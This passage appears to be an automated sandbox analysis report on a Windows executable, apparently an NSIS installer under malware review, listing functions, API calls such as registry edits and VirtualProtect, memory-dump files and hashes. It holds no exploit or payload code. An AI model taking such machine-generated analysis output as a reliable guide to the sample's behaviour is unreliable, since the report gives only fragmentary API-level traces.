                                                • Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                • Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55
                                                Function 0040247E Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024AF
                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp,00000000,00000011,00000002), ref: 00402551
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: CloseQueryValue
                                                • String ID:
                                                • API String ID: 3356406503-0
                                                • Opcode ID: 8261bc8437de9397d7efa493d3c14ec671ad5d0a4e3b3d70237c1a055cd98deb
                                                • Instruction ID: 5dbb434a41a715d7517c89e318d331cd35bfdf9d93bbd69694c25902619df99f
                                                • Opcode Fuzzy Hash: 8261bc8437de9397d7efa493d3c14ec671ad5d0a4e3b3d70237c1a055cd98deb
                                                • Instruction Fuzzy Hash: DC11A331910209EFEF24DFA4CA585BEB6B4EF04354F21843FE046A72C0D7B84A45DB59
                                                Function 00405C5B Relevance: 3.0, APIs: 2, Instructions: 47stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                  • Part of subcall function 00405BFE: CharNextW.USER32(?,?,0042FA50,?,00405C72,0042FA50,0042FA50,?,?,74DF3420,004059B0,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405C0C
                                                  • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
                                                  • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29
                                                • lstrlenW.KERNEL32(0042FA50,00000000,0042FA50,0042FA50,?,?,74DF3420,004059B0,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405CB4
                                                • GetFileAttributesW.KERNELBASE(0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,00000000,0042FA50,0042FA50,?,?,74DF3420,004059B0,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 00405CC4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                • String ID:
                                                • API String ID: 3248276644-0
                                                • Opcode ID: a970eb1a3142989cf927e9e4643bcace7998e9650737c8fd412cf721476e62ae
                                                • Instruction ID: 85ea7651a51856ee7c4c0712bbf35357d52fdd33bb29f336d43f3a771a20a055
                                                • Opcode Fuzzy Hash: a970eb1a3142989cf927e9e4643bcace7998e9650737c8fd412cf721476e62ae
                                                • Instruction Fuzzy Hash: 0DF0F925109F5215F622323A1D09EAF2554CF83368716463FF952B16D5DA3C99038D7D
                                                Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                • Instruction ID: eaafb4699c1cdf5c6f59fde68eca766a765a16907ebce13606274643e5ac5f14
                                                • Opcode Fuzzy Hash: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                • Instruction Fuzzy Hash: 8D0128316242209FE7095B789D05B6A3698E710715F14463FF851F62F1D678CC429B4C
                                                Function 00402388 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
                                                • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: CloseDeleteValue
                                                • String ID:
                                                • API String ID: 2831762973-0
                                                • Opcode ID: 521e33bf1c8ff9c3df6ac7757e7f8edd3bb41d92ca0b3b7281954678aee4cd22
                                                • Instruction ID: a65daa511511277569afb244ca8fe97b80a25767db049908362439423f8cf232
                                                • Opcode Fuzzy Hash: 521e33bf1c8ff9c3df6ac7757e7f8edd3bb41d92ca0b3b7281954678aee4cd22
                                                • Instruction Fuzzy Hash: E5F09632A041149BE711BBA49B4EABEB2A99B44354F16043FFA02F71C1DEFC4D41966D
                                                Function 00401E43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                Download Yara Rule
                                                APIs
                                                • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Window$EnableShow
                                                • String ID:
                                                • API String ID: 1136574915-0
                                                • Opcode ID: 2eb542d08f3645705a96f7068f662fa96ba88c07949deaf1805fa2c2c225f25f
                                                • Instruction ID: 09ae210f1740f3e2fd0b4033472822fcab18c129469b5f5a82ca29d8a3c9addd
                                                • Opcode Fuzzy Hash: 2eb542d08f3645705a96f7068f662fa96ba88c07949deaf1805fa2c2c225f25f
                                                • Instruction Fuzzy Hash: DEE09232E082008FD7149BA5AA494AD77B4EB84364720403FE112F11C1DA7848418F59
                                                Function 0040665C Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                  • Part of subcall function 004065EC: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
                                                  • Part of subcall function 004065EC: wsprintfW.USER32 ref: 0040663E
                                                  • Part of subcall function 004065EC: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406652
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                • String ID:
                                                • API String ID: 2547128583-0
                                                • Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                • Instruction ID: f71ddd0ba98f8a8be4c3f380e987b43417b0e7e7cad23f5b62dfe7414387192f
                                                • Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                • Instruction Fuzzy Hash: 18E026321002016AC7008A305E4083763AC9B85340303883FFD46F2081DB39DC31A6AD
                                                Function 00405D74 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\3507071243740008011.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                Function 00405832 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,00000000,00403366,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 00405838
                                                • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405846
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: CreateDirectoryErrorLast
                                                • String ID:
                                                • API String ID: 1375471231-0
                                                • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                • Instruction ID: 034de6f099216337e7681325378c15a49c0ca39433587e883605b7c80b1fabea
                                                • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                • Instruction Fuzzy Hash: C8C08C312155019AC7002F219F08B0B3A50AB20340F018439A946E00E0DA308424DD2D
                                                Function 004027E9 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402807
                                                  • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: FilePointerwsprintf
                                                • String ID:
                                                • API String ID: 327478801-0
                                                • Opcode ID: 25119fcbc0a3167edfdd7d21477dcc65c7f09cfc642675181383071420b6b3c2
                                                • Instruction ID: 338d2460217d73ea2e2bb91e7847e27d4a9cf2f97daf1e2edf82c438741940a9
                                                • Opcode Fuzzy Hash: 25119fcbc0a3167edfdd7d21477dcc65c7f09cfc642675181383071420b6b3c2
                                                • Instruction Fuzzy Hash: 83E09271B00104AFDB11EBA5AE498AE7779DB80314B24403BF101F50D2CA794E119E2D
                                                Function 00402306 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                Download Yara Rule
                                                APIs
                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: PrivateProfileStringWrite
                                                • String ID:
                                                • API String ID: 390214022-0
                                                • Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                • Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
                                                • Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                • Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
                                                Function 0040611D Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406146
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                • Instruction ID: 190238b8cd19dd4efab6c9cc8903e135eae53195524c7f3a74b1c4143961a507
                                                • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                • Instruction Fuzzy Hash: A1E0E6B2010109BEDF095F50DD0AD7B371DEB04704F01452EFA57D5091E6B5A9309679
                                                Function 00405E26 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032DE,000000FF,00416A00,?,00416A00,?,?,00000004,00000000), ref: 00405E3A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: FileWrite
                                                • String ID:
                                                • API String ID: 3934441357-0
                                                • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                • Instruction ID: 087a0ba252b1651b23da729bb4e18d02a4b8a10c1fd3406c9ee2a7e33144c981
                                                • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                • Instruction Fuzzy Hash: 96E0463221021AABCF10AF50CC04AAB3B6CFB003A0F004432B955E2050D230EA208AE9
                                                Function 00405DF7 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403328,00000000,00000000,0040314C,?,00000004,00000000,00000000,00000000), ref: 00405E0B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                • Instruction ID: e221de633d5b74da9fce23a9c995dc3304d5126a795d503f9c3389b6b2e666c2
                                                • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                • Instruction Fuzzy Hash: 4DE0EC3221025AABDF10AF95DC00EEB7B6CEB05360F044436FA65E7150D631EA619BF8
                                                Function 100027C2 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2455471246.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2455454451.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.2455493031.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.2455538566.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                • Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
                                                • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                • Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19
                                                Function 00402348 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402379
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
